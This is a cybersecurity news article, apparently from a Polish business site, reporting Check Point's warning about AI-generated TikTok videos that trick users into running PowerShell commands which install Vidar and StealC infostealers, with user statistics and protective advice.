Hackers are increasingly using AI-generated videos on TikTok to trick users into downloading malware designed to steal sensitive information, cybersecurity experts at Check Point Software Technologies warn.
A Simple Yet Effective Attack Strategy
The method is deceptively straightforward: cybercriminals use artificial intelligence to mass-produce short tutorial-style videos that claim to show how to easily “activate” Windows or Microsoft Office, or unlock premium features in apps like Spotify or CapCut. These videos are then posted on TikTok, leveraging the platform’s algorithm to quickly go viral and reach large audiences. According to early analyses, one such video gained over 500,000 views.
“These are social engineering attacks that manipulate users into compromising their own systems. The instructions may look harmless or even convincing, but in reality, they execute malicious scripts, steal login credentials, or grant remote access to attackers,” says Wojciech Głażewski, Country Director at Check Point Software in Poland.
TikTok’s Popularity Amplifies the Risk
The threat is particularly serious given TikTok’s massive user base in Poland. As of 2024, the app had 13.5 million users in the country, amounting to 45.7% of all Polish internet users. It is especially popular among younger audiences, who spend an average of 1 hour and 22 minutes per day on the platform—more than on any other social media network.
This latest scheme is a modern version of a classic scam. The videos show a person opening the Windows “Run” dialog box and entering a PowerShell command, allegedly to unlock hidden features. In reality, the command downloads a malicious script that installs Vidar and StealC spyware. While the videos differ slightly in camera angles and URLs used in the scripts, their structure is nearly identical—suggesting automated content generation. The narration also appears to be AI-generated.
“These programs can take screenshots, steal login credentials, credit card information, cookies, crypto wallet data, 2FA codes, and much more,” Głażewski emphasizes.
A Shift in Tactics
Although video content has been used in malware campaigns before, this approach represents a significant shift. Previously, malicious links were typically placed in the video description or comments—locations that security systems could scan. Now, the malicious payload is embedded directly in the video content, helping hackers evade traditional detection mechanisms.
How to Protect Yourself
Cybersecurity experts recommend several precautions:
- Avoid unverified commands, especially PowerShell scripts from unknown sources.
- Use reliable security software to monitor and block suspicious activity.
- And perhaps most importantly, use AI to fight AI—for example, ask ChatGPT or another AI assistant what a command does before running it to ensure it doesn’t download, execute, or damage anything on your computer.
Source: ceo.com.pl
